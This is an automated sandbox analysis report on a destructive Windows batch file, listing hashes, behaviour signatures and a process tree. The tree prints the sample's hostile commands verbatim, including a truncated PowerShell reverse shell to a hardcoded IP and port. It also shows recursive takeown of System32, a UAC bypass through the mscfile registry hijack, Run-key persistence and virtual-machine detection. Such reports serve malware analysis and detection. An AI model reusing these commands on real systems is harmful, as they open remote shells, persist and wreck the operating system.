Analysis
max time kernel: 147s
max time network: 146s
platform: windows10-1703_x64
resource: win10-20240404-en
resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
submitted: 08/09/2024, 06:47
Static task: static1
Behavioral task behavioral1: sample custom.bat, resource win10-20240404-en
Behavioral task behavioral2: sample custom.bat, resource win7-20240903-en
Behavioral task behavioral3: sample custom.bat, resource win10v2004-20240802-en
Behavioral task behavioral4: sample custom.bat, resource win11-20240802-en
General
Target: custom.bat
Size: 4KB
MD5: 1c63745d54962d205bb3ae879bea1ed4
SHA1: a832c894a4e2b6d486c48b9ea6ec79d94df9537e
SHA256: 396ea933ebc00327d2ea983206ccd2a832999c28a7df070000fe9874890b5a0e
SHA512: 129d73d0fd5967b232c54d50bc94ed171dd2ee5da2222b18bd350b42808799575a3a726c7b0b46b65d2717d025b9ebeb424a834f42540daf8308be3171a4af39
SSDEEP: 96:NQN1Vh0eAwx86mwCVHVsOvx8vXSu7eQ/GdZj/BawH6im7BFVPhGHixL:NOueA8CVHiOvx8vC0emG7LBawH6/Yix
Malware Config
Signatures

Modifies file permissions (1 TTPs, 2 IoCs)
  pid 4204  takeown.exe
  pid 4732  takeown.exe

Adds Run key to start application (2 TTPs, 1 IoCs)
  Set value (str)  \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\TotalDestruction = "C:\\Users\\Admin\\AppData\\Local\\Temp\\custom.bat"  reg.exe

Command and Scripting Interpreter: PowerShell
  pid 1308  powershell.exe
  pid 2492  powershell.exe

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

Delays execution with timeout.exe (2 IoCs)
  pid 1940  timeout.exe
  pid 1136  timeout.exe

Gathers system information (1 TTPs, 3 IoCs)
  Runs systeminfo.exe.
  pid 1996  systeminfo.exe
  pid 4132  systeminfo.exe
  pid 744   systeminfo.exe

Modifies registry class (10 IoCs)
  Key created      \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile\shell\open\command  reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile  reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile\shell\open  reg.exe
  Key deleted      \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile\shell\open\command  reg.exe
  Key deleted      \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile\shell\open  reg.exe
  Key deleted      \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile\shell  reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile\shell  reg.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\full_destruction.bat"  reg.exe
  Key created      \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings  cmd.exe
  Key deleted      \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\mscfile  reg.exe

Suspicious behavior: EnumeratesProcesses (6 IoCs)
  pid 2492  powershell.exe
  pid 2492  powershell.exe
  pid 2492  powershell.exe
  pid 1308  powershell.exe
  pid 1308  powershell.exe
  pid 1308  powershell.exe

Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Token: SeDebugPrivilege          pid 2492  powershell.exe
  Token: SeTakeOwnershipPrivilege  pid 4732  takeown.exe
  Token: SeDebugPrivilege          pid 1308  powershell.exe
  Token: SeTakeOwnershipPrivilege  pid 4204  takeown.exe

Suspicious use of WriteProcessMemory (34 IoCs)
  description                        pid   Process   procid_target
  PID 4664 wrote to memory of 3096   4664  cmd.exe   74
  PID 4664 wrote to memory of 3096   4664  cmd.exe   74
  PID 4664 wrote to memory of 2492   4664  cmd.exe   75
  PID 4664 wrote to memory of 2492   4664  cmd.exe   75
  PID 4664 wrote to memory of 1940   4664  cmd.exe   76
  PID 4664 wrote to memory of 1940   4664  cmd.exe   76
  PID 4664 wrote to memory of 1964   4664  cmd.exe   77
  PID 4664 wrote to memory of 1964   4664  cmd.exe   77
  PID 4664 wrote to memory of 3328   4664  cmd.exe   78
  PID 4664 wrote to memory of 3328   4664  cmd.exe   78
  PID 4664 wrote to memory of 1136   4664  cmd.exe   81
  PID 4664 wrote to memory of 1136   4664  cmd.exe   81
  PID 3328 wrote to memory of 4732   3328  cmd.exe   82
  PID 3328 wrote to memory of 4732   3328  cmd.exe   82
  PID 4664 wrote to memory of 2484   4664  cmd.exe   83
  PID 4664 wrote to memory of 2484   4664  cmd.exe   83
  PID 4664 wrote to memory of 1996   4664  cmd.exe   84
  PID 4664 wrote to memory of 1996   4664  cmd.exe   84
  PID 4664 wrote to memory of 404    4664  cmd.exe   85
  PID 4664 wrote to memory of 404    4664  cmd.exe   85
  PID 4664 wrote to memory of 4132   4664  cmd.exe   88
  PID 4664 wrote to memory of 4132   4664  cmd.exe   88
  PID 4664 wrote to memory of 4244   4664  cmd.exe   89
  PID 4664 wrote to memory of 4244   4664  cmd.exe   89
  PID 4664 wrote to memory of 744    4664  cmd.exe   90
  PID 4664 wrote to memory of 744    4664  cmd.exe   90
  PID 4664 wrote to memory of 1484   4664  cmd.exe   91
  PID 4664 wrote to memory of 1484   4664  cmd.exe   91
  PID 4664 wrote to memory of 1308   4664  cmd.exe   92
  PID 4664 wrote to memory of 1308   4664  cmd.exe   92
  PID 4664 wrote to memory of 4584   4664  cmd.exe   93
  PID 4664 wrote to memory of 4584   4664  cmd.exe   93
  PID 4664 wrote to memory of 4204   4664  cmd.exe   94
  PID 4664 wrote to memory of 4204   4664  cmd.exe   94
Processes (indentation shows parent/child depth)

C:\Windows\system32\cmd.exe
    command: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"
    Modifies registry class
    Suspicious use of WriteProcessMemory
    PID: 4664

    C:\Windows\system32\mode.com
        command: mode con: cols=800 lines=60
        PID: 3096

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command: powershell -Command "$wshell = New-Object -ComObject wscript.shell; $wshell.SendKeys('{F11}')"
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        PID: 2492

    C:\Windows\system32\timeout.exe
        command: timeout /t 5
        Delays execution with timeout.exe
        PID: 1940

    C:\Windows\system32\reg.exe
        command: reg add "HKCU\Software\Classes\mscfile\shell\open\command" /d "C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" /f
        Modifies registry class
        PID: 1964

    C:\Windows\system32\cmd.exe
        command: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" "
        Suspicious use of WriteProcessMemory
        PID: 3328

        C:\Windows\system32\takeown.exe
            command: takeown /f C:\Windows\System32\* /r /d y
            Modifies file permissions
            Suspicious use of AdjustPrivilegeToken
            PID: 4732

    C:\Windows\system32\timeout.exe
        command: timeout /t 5
        Delays execution with timeout.exe
        PID: 1136

    C:\Windows\system32\reg.exe
        command: reg delete "HKCU\Software\Classes\mscfile" /f
        Modifies registry class
        PID: 2484

    C:\Windows\system32\systeminfo.exe
        command: systeminfo
        Gathers system information
        PID: 1996

    C:\Windows\system32\findstr.exe
        command: findstr /i "VirtualBox"
        PID: 404

    C:\Windows\system32\systeminfo.exe
        command: systeminfo
        Gathers system information
        PID: 4132

    C:\Windows\system32\findstr.exe
        command: findstr /i "VMware"
        PID: 4244

    C:\Windows\system32\systeminfo.exe
        command: systeminfo
        Gathers system information
        PID: 744

    C:\Windows\system32\findstr.exe
        command: findstr /i "Hyper-V"
        PID: 1484

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command (as captured, truncated in the report): powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        PID: 1308

    C:\Windows\system32\reg.exe
        command: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "TotalDestruction" /d "C:\Users\Admin\AppData\Local\Temp\custom.bat" /f
        Adds Run key to start application
        PID: 4584

    C:\Windows\system32\takeown.exe
        command: takeown /f C:\Windows\System32\* /r /d y
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        PID: 4204
Network
MITRE ATT&CK Enterprise v15